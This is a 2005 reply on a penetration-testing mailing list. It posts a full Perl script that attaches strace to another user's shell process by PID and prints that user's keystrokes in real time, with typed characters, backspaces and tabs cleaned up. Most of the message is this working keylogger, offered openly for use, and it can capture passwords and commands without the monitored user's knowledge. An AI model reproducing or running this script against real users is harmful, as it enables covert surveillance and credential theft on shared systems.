Penetration Testing mailing list archives
Re: Keystroke logging with strace (no setup required)
From: rootsuid <rootsuid () gmail com>
Date: Tue, 12 Jul 2005 19:15:46 +0000
I didn't like going between terminals (even through screen).. so I just changed the one line: --- open (F, "tail -f $ARGV[0] |"); ---- changes to open (F, "strace -p $ARGV[0] 2>&1 |"); ---- then you ./strace_clean.pl <PID>, also, if you aren't familiar with perl, this script is waiting for line returns (so it does work on other applications too, but you will not see the text until the user hits enter, vim, etc) --root ----- strace_clean-new.pl #!/usr/bin/perl -w # # Monitoring a user's shellcommands by using strace and displaying and cleaning up the read() syscalls # Based on the tip posted to secfocus by Mark Lachniet, written by Tom Van de Wiele. # # To be used on a logfile or in real-time (as fast as /usr/bin/script logs to file that is) like this: # # # script /tmp/what_is_user_foo_doing.log # Script started, file is /tmp/what_is_user_foo_doing.log # # strace -p <PID of shell of user> # # Using a different terminal at the same time: # # perl strace_clean.pl /tmp/what_is_user_doing.log # # use strict; # hi Kris :) my $char; open (F, "strace -p $ARGV[0] 2>&1 |"); while (<F>) { next if !/^read/; next if /^$/; if (/^read\(0,\s\"(.*)\".*/) { $char = $1; if ($char =~ /\\r/) { print "\n"; } elsif ($char =~ /\\177/) { print "\b"; } elsif ($char =~ /\\t/) { print "<TAB>"; } else { print $char; } } } #EOF
Current thread:
- Keystroke logging with strace (no setup required) Lachniet, Mark (Jul 07)
- <Possible follow-ups>
- RE: Keystroke logging with strace (no setup required) Lachniet, Mark (Jul 12)
- Re: Keystroke logging with strace (no setup required) rootsuid (Jul 12)
- Re: Keystroke logging with strace (no setup required) Can't dig that daddy (Jul 18)